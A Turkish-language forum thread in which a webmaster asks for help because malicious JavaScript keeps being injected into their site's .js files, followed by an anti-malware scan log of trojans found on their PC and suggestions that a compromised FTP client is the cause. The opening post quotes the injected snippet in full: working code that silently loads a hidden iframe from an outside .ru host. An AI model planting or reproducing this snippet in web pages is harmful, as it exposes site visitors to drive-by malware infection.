.Js Malware
-
/*e2aa4e*/ (function () { var ope = document.createElement('iframe'); ope.src = 'http://sumjecyg.ru/count15.php'; ope.style.position = 'absolute'; ope.style.border = '0'; ope.style.height = '1px'; ope.style.width = '1px'; ope.style.left = '1px'; ope.style.top = '1px'; if (!document.getElementById('ope')) { document.write(' '); document.getElementById('ope').appendChild(ope); } })(); /*/e2aa4e*/
paso .js dosyalarına bulaşıyor. her sabah siteyi yeniden upload etmekten usandım.
chmod ayarlarından yazmayı kapattım ama yine olmadı. benim pc den zıplıyor sanırım. virüs programım yok.
şöyle var mı güzelinden malware spy falan temizleyen. -
-
C:\Windows\Temp\temp96.exe (Malware.Packer.RAN) -> Yeniden başlatımda silinecek.
C:\Windows\Temp\kb763382.exe (Trojan.Agent.FSA42) -> Yeniden başlatımda silinecek.
C:\Windows\Temp\kb481628.exe (Trojan.Agent.FSA42) -> Yeniden başlatımda silinecek.
C:\Windows\Temp\kb210068.exe (Trojan.Agent.FSA42) -> Yeniden başlatımda silinecek.
C:\Users\Levent\AppData\Local\Temp\wlsidten.exe (Trojan.Lameshield.124) -> Başarıyla karantinaya alınıp silindi.
C:\Users\Levent\Local Settings\Temporary Internet Files\Content.IE5\BBPE8CA4\calc[1].exe (Trojan.Agent.FSA42) -> Başarıyla karantinaya alınıp silindi.
C:\Users\Levent\Local Settings\Temporary Internet Files\Content.IE5\BX3S2X6J\calc[1].exe (Trojan.Agent.FSA42) -> Başarıyla karantinaya alınıp silindi.
C:\Users\Levent\Local Settings\Temporary Internet Files\Content.IE5\I43KBTZT\calc[1].exe (Trojan.Agent.FSA42) -> Başarıyla karantinaya alınıp silindi.bitane daha alternatif alayım mümkünse. sonra bi combofix çakcam. format atamıyorum acil işler var.
-
Hocam, ftp programı olarak filezilla tarzı bir şey kullanıyorsan ondan olabilir.
-
sildim filezillayı da ama ondan şüphelenmiyorum explorer ile dosya atıyodum bazen.
sistemde vardı bişe muhtemelen neyse 3 tane anti ile tarattım combo da çaktım bakalım artık.